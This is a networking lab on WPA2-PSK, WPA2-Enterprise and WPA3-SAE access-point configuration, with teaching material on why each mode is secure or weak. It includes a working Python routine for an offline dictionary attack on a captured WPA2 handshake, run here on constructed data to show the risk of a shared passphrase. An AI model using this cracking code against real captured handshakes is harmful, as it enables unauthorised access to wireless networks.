Wireless Security Modes
Lab Objectives
- Configure and compare three wireless security modes: WPA2-PSK, WPA2-Enterprise (RADIUS), and WPA3 on an autonomous access point.
- Explain the theory behind each security mode and verify client association and authentication.
- Understand production considerations for choosing a wireless security mode.
Lab Tasks (Try It Yourself First!)
Complete these tasks WITHOUT looking at the solution below. Use `?` and `show` commands to figure it out.
Task 1: Configure WPA2-PSK
Create an SSID "NHPREP-SALES" mapped to VLAN 10 (192.168.1.0/24) and secure it using WPA2-PSK with passphrase Lab@123. Allow only AES-based encryption (WPA2).
Task 2: Configure WPA2-Enterprise (RADIUS)
Create an SSID "NHPREP-ENG" mapped to VLAN 20 (192.168.2.0/24) using WPA2-Enterprise that authenticates clients against a RADIUS server at 192.168.3.250 (management VLAN). Use shared secret Lab@123.
Task 3: Configure WPA3
Create an SSID "NHPREP-MGMT" mapped to VLAN 30 (192.168.3.0/24) secured with WPA3-SAE (Simultaneous Authentication of Equals). Use passphrase Lab@123.
Think About It: Why is WPA2-Enterprise (RADIUS) typically preferred in enterprise networks compared to WPA2-PSK? What trade-offs does WPA3 introduce for legacy devices in your network?
BASE LAB TOPOLOGY (use this EXACT topology for all CCNA labs)
[Internet]
203.0.113.1
|
R1 (Gateway)
Gi0/0: 10.10.10.1
Gi0/1: 10.10.20.1
Gi0/2: 10.10.30.1
/ | \
R2 R3 R4
Gi0/0: 10.10.10.2 | Gi0/0: 10.10.30.2
Gi0/1: 10.10.40.1 |
/ \ |
S1 S2 S3
/ \ | /
PC1 PC2 PC3 PC4 PC5
IP SCHEME:
- 10.10.10.0/24 — R1-R2 link
- 10.10.20.0/24 — R1-R3 link
- 10.10.30.0/24 — R1-R4 link
- 10.10.40.0/24 — R2-S1 link
- 192.168.1.0/24 — VLAN 10 (Sales)
- 192.168.2.0/24 — VLAN 20 (Engineering)
- 192.168.3.0/24 — VLAN 30 (Management)
- 203.0.113.0/24 — Public/Internet simulation
Tip: In this lab we assume an autonomous AP connected to S2. The AP bridges wireless clients onto the configured VLANs. The RADIUS server resides in VLAN 30 at 192.168.3.250.
Lab Solution
Task 1 Solution: Configure WPA2-PSK
What we are doing: Create SSID NHPREP-SALES on the AP, bind it to VLAN 10 (Sales) and protect it with WPA2-PSK using AES-CCMP. WPA2-PSK is simple to deploy for small networks, but one passphrase is shared by every client: it cannot be revoked for a single user, anyone who holds it can decrypt another client's traffic after observing that client's 4-way handshake, and a single captured handshake can be attacked offline with a wordlist.
configure terminal
!
dot11 ssid NHPREP-SALES
 vlan 10
 authentication open
 authentication key-management wpa version 2
 wpa-psk ascii Lab@123
!
interface Dot11Radio0
 encryption vlan 10 mode ciphers aes-ccm
 ssid NHPREP-SALES
 no shutdown
!
interface Dot11Radio0.10
 encapsulation dot1Q 10
 bridge-group 10
!
interface GigabitEthernet0.10
 encapsulation dot1Q 10
 bridge-group 10
!
end
What the commands do and why they matter:
- `dot11 ssid NHPREP-SALES`: creates the SSID profile that groups the security and VLAN settings for this wireless network.
- `vlan 10`: maps the SSID to VLAN 10 so wireless clients get addresses in 192.168.1.0/24; in production this is what keeps Sales traffic apart from the other SSIDs.
- `authentication open`: open 802.11 association (no WEP shared-key authentication). The real access control is the WPA2 4-way handshake that follows association.
- `authentication key-management wpa version 2`: requires WPA2 (IEEE 802.11i) key management; WPA version 1 (TKIP) is not offered.
- `wpa-psk ascii Lab@123`: sets the pre-shared key. Clients derive the PMK from this passphrase and the SSID, so every client on the SSID shares the same secret. Note that 802.11i requires an ASCII passphrase of 8 to 63 characters, so a real AP will refuse the 7-character Lab@123; lengthen it (for example Lab@1234) if the command is rejected.
- `encryption vlan 10 mode ciphers aes-ccm`: restricts VLAN 10 to AES-CCMP. The AP will not enable WPA key management until a cipher is configured on the radio, and listing only aes-ccm (no tkip) is what satisfies the "AES only" requirement.
- `interface Dot11Radio0` / `ssid NHPREP-SALES`: binds the SSID to the radio so the AP advertises it.
- `Dot11Radio0.10` and `GigabitEthernet0.10` with `encapsulation dot1Q 10` and `bridge-group 10`: an autonomous AP has no switchport commands; VLAN 10 frames are bridged between the radio and the wired uplink through matching 802.1Q subinterfaces. The S2 port facing the AP must be an 802.1Q trunk that allows VLAN 10.
Verify:
show dot11 ssid
Expected output (example):
SSID name: NHPREP-SALES
SSID admin state: enabled
Authentication: OPEN
WPA version: WPA2
WPA key management: PSK
WPA PSK: configured
VLAN: 10
show dot11 associations
Expected output when a client is associated:
Number of clients: 1
Client MAC AP RF SSID VLAN IPv4 Address
00:11:22:33:44:55 Dot11Radio0 NHPREP-SALES 10 192.168.1.10
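To make concrete why the shared passphrase in Task 1 is the weak point, here is an added example (not part of this lab or of Cisco's software) that reproduces the WPA2-PSK key derivation from IEEE 802.11i: the PMK from passphrase and SSID via PBKDF2, the PTK from the PMK plus the two MAC addresses and nonces, and the EAPOL-Key MIC that a sniffer sees in message 2 of the 4-way handshake. Everything except the passphrase travels in cleartext, so whoever captured one handshake can test candidate passphrases offline with no further contact with the AP. The BSSID, client MAC, nonces, EAPOL bytes and wordlist are constructed for the demo, and the passphrase is Lab@1234 rather than the lab's Lab@123 because the latter is below the 8-character 802.11i minimum.

```python
"""WPA2-PSK key derivation and an offline dictionary attack on a captured 4-way handshake.
Added example, not part of the lab or of Cisco's software. MACs, nonces, EAPOL bytes and
the wordlist are constructed; only the math follows IEEE 802.11i."""
import hashlib
import hmac

SSID = b"NHPREP-SALES"


def pmk_from_passphrase(passphrase: str, ssid: bytes = SSID) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    Every client on the SSID shares this value until the passphrase is changed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP) = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Layout: KCK (16) | KEK (16) | TK (16). Every input except the PMK is visible on the air."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_key_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP with the PSK AKM: MIC = HMAC-SHA1-128(KCK, EAPOL-Key frame with the MIC field zeroed)."""
    return hmac.new(kck, eapol_key_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(wordlist, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic):
    """Offline dictionary attack: recompute the MIC for each candidate and compare.
    No interaction with the AP is needed, so nothing rate-limits the attacker."""
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_zeroed), captured_mic):
            return candidate
    return None


def demo(true_passphrase: str = "Lab@1234"):
    """Simulate a capture of handshake message 2, then recover the passphrase from a wordlist.
    Lab@1234 is used because the lab's Lab@123 is below the 8-character 802.11i minimum."""
    ap_mac = bytes.fromhex("001122334455")   # constructed BSSID
    sta_mac = bytes.fromhex("66778899aabb")  # constructed client MAC
    anonce = hashlib.sha256(b"constructed ANonce").digest()  # 32-byte nonces, as on the air
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    # Stand-in for EAPOL-Key message 2 with its MIC field zeroed; a real capture supplies the exact frame.
    eapol_zeroed = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + b"\x01" + snonce + bytes(16) + bytes(18)
    # What the sniffer recorded: the MIC the real client computed with the real passphrase.
    real_ptk = derive_ptk(pmk_from_passphrase(true_passphrase), ap_mac, sta_mac, anonce, snonce)
    captured_mic = eapol_mic(real_ptk[:16], eapol_zeroed)
    wordlist = ["password", "Lab@123", "nhprep2024", "Lab@1234", "correct horse battery"]  # constructed
    return crack(wordlist, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096 PBKDF2 iterations are the only cost per guess, and a GPU performs hundreds of thousands of them per second; this is the attack that WPA3-SAE in Task 3 removes, since SAE never lets a passive observer obtain anything that a candidate passphrase can be checked against.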
Task 2 Solution: Configure WPA2-Enterprise (RADIUS)
What we are doing: Configure the AP to use a RADIUS server (192.168.3.250) to authenticate clients for SSID NHPREP-ENG on VLAN 20. WPA2-Enterprise uses unique credentials (e.g., username/password or certificates) per user and is scalable and auditable — ideal for enterprise use.
configure terminal
!
aaa new-model
aaa group server radius NHPREP-RAD
 server name NHPREP-RADIUS
aaa authentication login eap_methods group NHPREP-RAD
!
radius server NHPREP-RADIUS
 address ipv4 192.168.3.250 auth-port 1812
 key Lab@123
!
dot11 ssid NHPREP-ENG
 vlan 20
 authentication open eap eap_methods
 authentication key-management wpa version 2
!
interface Dot11Radio0
 encryption vlan 20 mode ciphers aes-ccm
 ssid NHPREP-ENG
!
interface Dot11Radio0.20
 encapsulation dot1Q 20
 bridge-group 20
!
interface GigabitEthernet0.20
 encapsulation dot1Q 20
 bridge-group 20
!
end
What the commands do and why they matter:
- `aaa new-model`: enables the AAA subsystem; without it the SSID cannot reference an external authentication server.
- `aaa group server radius NHPREP-RAD` / `aaa authentication login eap_methods group NHPREP-RAD`: places the server in a group and creates the method list (`eap_methods`) that the SSID points at. On an autonomous AP the SSID references a method list, not a server directly.
- `radius server NHPREP-RADIUS ... key Lab@123`: defines the server address, port and shared secret. The secret is not a client credential: it keys the Message-Authenticator on Access-Requests and the Response Authenticator on the server's replies, and it hides any User-Password attribute, so it authenticates the AP-to-server channel. Client identity is proven inside the EAP exchange (a certificate, or a username and password under a TLS tunnel), never by the secret.
- `authentication open eap eap_methods`: open association followed by 802.1X/EAP, which the AP relays to the RADIUS group named in the method list. The PMK comes out of the EAP exchange and is unique per session, so there is no shared passphrase to leak. If clients use PEAP or EAP-TTLS rather than EAP-TLS, configure them to validate the RADIUS server's certificate; otherwise a rogue AP advertising NHPREP-ENG can harvest their credentials.
- `authentication key-management wpa version 2` and `encryption vlan 20 mode ciphers aes-ccm`: WPA2 key management with AES-CCMP, as in Task 1.
- The VLAN 20 subinterfaces with `bridge-group 20` carry Engineering traffic onto 192.168.2.0/24; the S2 trunk must allow VLAN 20.
Verify:
show radius servers
Expected output:
Radius server NHPREP-RADIUS
Address: 192.168.3.250
Auth port: 1812
Key: configured
Status: reachable
show dot11 ssid
Expected snippet:
SSID name: NHPREP-ENG
SSID admin state: enabled
Authentication: OPEN
WPA version: WPA2
WPA key management: 802.1X (RADIUS)
VLAN: 20
show aaa sessions
Expected output when a client is authenticating:
Username Service State Client IP NAS Port
alice dot1x Authorized 192.168.2.50 Dot11Radio0
Task 3 Solution: Configure WPA3
What we are doing: Create SSID NHPREP-MGMT on VLAN 30 using WPA3-SAE (SAE = Simultaneous Authentication of Equals). WPA3-Personal replaces the PSK-derived key of WPA2 with SAE, a password-authenticated key exchange that resists offline dictionary attacks on a captured handshake and gives each session forward secrecy, but older clients that lack SAE or Protected Management Frames cannot join a WPA3-only SSID.
configure terminal
!
dot11 ssid NHPREP-MGMT
vlan 30
authentication open
authentication key-management sae
sae-psk ascii Lab@123
!
interface Dot11Radio0
ssid NHPREP-MGMT
end
What the commands do and why they matter:
- `authentication key-management sae`: selects WPA3-SAE for password-based authentication in place of WPA2-PSK. SAE is a password-authenticated key exchange: the passphrase is never used as direct key material, every association produces a fresh PMK, and a passively captured exchange gives an attacker nothing to test guesses against. Guessing has to happen online, one attempt per exchange with the AP, which the AP can rate-limit.
- `sae-psk ascii Lab@123`: configures the SAE passphrase. SAE protects a weak passphrase from offline attack, not from online guessing, so still choose a long one.
- WPA3 requires Protected Management Frames (802.11w) to be mandatory, so deauthentication and disassociation frames are authenticated and cannot be forged to kick clients off; a client without PMF support cannot join.
- The SAE keywords above follow this lab's syntax. Autonomous IOS Aironet APs do not expose WPA3; on a controller-based deployment (for example a Catalyst 9800 running IOS-XE) the same policy is set under the WLAN with `security wpa wpa3`, `security wpa akm sae`, `security pmf mandatory` and `security wpa psk set-key ascii 0 <passphrase>`.
- Mapping to VLAN 30 isolates management traffic; in production, management SSIDs are usually restricted to specific radios and use WPA3 or enterprise authentication.
Verify:
show dot11 ssid
Expected snippet:
SSID name: NHPREP-MGMT
SSID admin state: enabled
Authentication: OPEN
WPA version: WPA3-SAE
Key management: SAE (PSK)
VLAN: 30
show dot11 associations
If a WPA3 client is associated:
Number of clients: 1
Client MAC AP RF SSID VLAN IPv4 Address Auth Method
66:77:88:99:AA:BB Dot11Radio0 NHPREP-MGMT 30 192.168.3.20 SAE
Troubleshooting Scenario
Scenario: RADIUS authentication fails for NHPREP-ENG
Symptom: Client cannot connect to NHPREP-ENG; wireless client reports "authentication failed."
Your task: Find and fix the issue.
Hint: Check shared secret and reachability between AP and RADIUS server.
Solution:
- On the AP, verify the RADIUS server settings and test reachability:
show radius servers
ping 192.168.3.250
- If `show radius servers` shows `Key: configured` but `Status: unreachable`, the problem is network, VLAN or trunk reachability: make sure the AP's uplink and the S2 trunk carry VLAN 30 and that the AP can reach 192.168.3.250 in VLAN 30.
- If the server is reachable, confirm that the shared secret matches on both sides. A mismatch is not reported as a rejection: the server drops the request, the AP waits and retries, and the client sees a timeout or "authentication failed". Set the secret to Lab@123 on both the AP (`key Lab@123` under `radius server NHPREP-RADIUS`) and the RADIUS server. `debug radius authentication` on the AP shows Access-Requests going out with no Access-Accept or Access-Reject coming back.
- After fixing, retry the connection and verify with:
show aaa sessions
show dot11 associations
Explanation: Most RADIUS failures come down to a mismatched shared secret or an ACL/VLAN problem blocking UDP 1812 (1645 on legacy servers). Both look the same from the client side: because the secret is checked before the server answers, a wrong secret produces a silent discard and a timeout rather than an Access-Reject. In production, run at least two RADIUS servers and put both in the server group so the AP fails over, use a long random shared secret per NAS, and confirm that firewall rules allow UDP 1812/1813 (and 1645/1646 if the server still listens on the legacy ports).
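The troubleshooting scenario above turns on how the shared secret is actually used by RADIUS (RFC 2865 and RFC 2869). This added example (not part of the lab or of any RADIUS implementation) builds an Access-Request the way the AP would, checks it the way the server would, and then checks the server's Access-Accept the way the AP would, once with matching secrets and once with a one-character mismatch. The secret keys the Message-Authenticator (HMAC-MD5) on the request, the Response Authenticator (MD5) on the reply, and the XOR keystream that hides User-Password. The username, password, NAS address and Request Authenticator are constructed; a real NAS draws a random 16-byte Request Authenticator for every request.

```python
"""RADIUS shared-secret checks (RFC 2865, RFC 2869) that explain why a mismatched secret
looks like a timeout. Added example, not part of the lab or of any RADIUS implementation.
Usernames, passwords, NAS address and the Request Authenticator are constructed."""
import hashlib
import hmac
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, MESSAGE_AUTHENTICATOR = 1, 2, 4, 80


def attr(atype: int, value: bytes) -> bytes:
    """Type-Length-Value attribute; Length counts the two header bytes."""
    return struct.pack("!BB", atype, len(value) + 2) + value


def packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    """20-byte header (Code, Identifier, Length, Authenticator) followed by attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def hide_password(password: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with MD5(secret || previous block).
    The secret is the only key material, which is why it must be long and random."""
    padded = password + bytes(-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out, prev = out + block, block
    return out


def unhide_password(hidden: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """Server side of RFC 2865 5.2; trailing NUL padding is stripped."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def sign_request(ident: int, req_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """Append Message-Authenticator (RFC 2869 5.14): HMAC-MD5 keyed with the shared secret over
    the whole Access-Request with the attribute value zeroed. Mandatory whenever EAP is carried."""
    pkt = packet(ACCESS_REQUEST, ident, req_auth, attrs + attr(MESSAGE_AUTHENTICATOR, bytes(16)))
    return pkt[:-16] + hmac.new(secret, pkt, hashlib.md5).digest()


def verify_request(pkt: bytes, secret: bytes) -> bool:
    """Server side: locate attribute 80 and recompute the HMAC with its value zeroed.
    A failure is silently discarded (RFC 3579 3.3), never answered with an Access-Reject."""
    pos = 20
    while pos + 2 <= len(pkt):
        atype, alen = pkt[pos], pkt[pos + 1]
        if alen < 2:
            return False
        if atype == MESSAGE_AUTHENTICATOR and alen == 18:
            zeroed = pkt[:pos + 2] + bytes(16) + pkt[pos + 18:]
            expected = hmac.new(secret, zeroed, hashlib.md5).digest()
            return hmac.compare_digest(expected, pkt[pos + 2:pos + 18])
        pos += alen
    return False


def sign_response(code: int, ident: int, req_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: Response Authenticator = MD5(Code || ID || Length || RequestAuth || Attributes || Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return packet(code, ident, hashlib.md5(header + req_auth + attrs + secret).digest(), attrs)


def verify_response(resp: bytes, req_auth: bytes, secret: bytes) -> bool:
    """NAS side: a reply whose authenticator does not verify is dropped as if it never arrived."""
    expected = hashlib.md5(resp[:4] + req_auth + resp[20:] + secret).digest()
    return hmac.compare_digest(resp[4:20], expected)


def exchange(ap_secret: bytes, server_secret: bytes) -> str:
    """One Access-Request / Access-Accept round trip between an AP and a server holding the given secrets."""
    req_auth = hashlib.sha256(b"constructed Request Authenticator").digest()[:16]  # random per request in practice
    attrs = (attr(USER_NAME, b"alice")
             + attr(NAS_IP_ADDRESS, bytes([192, 168, 3, 10]))  # constructed AP management address
             + attr(USER_PASSWORD, hide_password(b"s3cret-pw", ap_secret, req_auth)))
    request = sign_request(7, req_auth, attrs, ap_secret)
    if not verify_request(request, server_secret):
        return "server silently discards the request; the AP times out and retries"
    response = sign_response(ACCESS_ACCEPT, 7, req_auth, attr(USER_NAME, b"alice"), server_secret)
    if not verify_response(response, req_auth, ap_secret):
        return "AP discards the reply: bad Response Authenticator"
    return "accepted"


if __name__ == "__main__":
    print("matching secrets:  ", exchange(b"Lab@123", b"Lab@123"))
    print("mismatched secrets:", exchange(b"Lab@123", b"Lab@124"))
```

A plain PAP request without Message-Authenticator would not be caught at this step: the server would unhide a garbage password, fail the lookup and return an Access-Reject whose Response Authenticator the AP then cannot verify, so the outcome is still a timeout from the client's point of view. Either way, nothing in the exchange tells the operator "wrong secret"; the AP-side debug and the server log are the only places it shows.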
Verification Checklist
- SSID NHPREP-SALES exists and shows WPA2-PSK, VLAN 10.
- SSID NHPREP-ENG exists and authenticates via RADIUS, VLAN 20.
- SSID NHPREP-MGMT exists and uses WPA3-SAE, VLAN 30.
- RADIUS server 192.168.3.250 is reachable from AP and uses shared key Lab@123.
Common Mistakes
| Symptom | Cause | Fix |
|---|---|---|
| Client cannot join WPA2-PSK SSID | Wrong passphrase entered on client or AP, or a passphrase shorter than the 8-character 802.11i minimum | Re-enter the passphrase on both sides; ensure wpa-psk ascii matches the client and is 8 to 63 characters (Lab@123 is one character short) |
| RADIUS authentication times out | VLAN/trunk not carrying management VLAN or UDP 1812 blocked | Verify trunk allowed VLAN 30 and ping 192.168.3.250; allow UDP 1812/1645 through firewall |
| Client cannot use WPA3 SSID | Client device does not support WPA3 | Use WPA2/WPA3 transitional mode in production or provide separate WPA2 SSID for legacy devices |
| SSID mapped to wrong VLAN | Mis-typed vlan under dot11 ssid | Reconfigure dot11 ssid ... vlan <correct> to the intended VLAN ID |
Challenge Task
Configure the AP so that NHPREP-ENG (WPA2-Enterprise) and NHPREP-MGMT (WPA3) are both advertised on the same radio but limit NHPREP-MGMT to allow only devices whose MAC addresses are pre-registered (MAC filtering). Implement this without using a RADIUS MAC-auth server — instead, configure local MAC ACL on the AP. (Goal only — you must determine the exact commands.)
Real-world note: Enterprises generally deploy WPA2- or WPA3-Enterprise with EAP-TLS client certificates, often combined with device posture checks; where PEAP or EAP-TTLS is used instead, clients must be configured to validate the RADIUS server certificate, or a rogue AP advertising the same SSID can harvest credentials. WPA3-SAE removes the offline dictionary attack on captured handshakes, but its rollout requires checking client support for SAE and mandatory PMF. MAC filtering, as in the challenge task, is a housekeeping control only: MAC addresses are sent in the clear and are trivially spoofed. Use redundant RADIUS servers and long, random, per-NAS shared secrets in production; Lab@123 belongs only in the lab.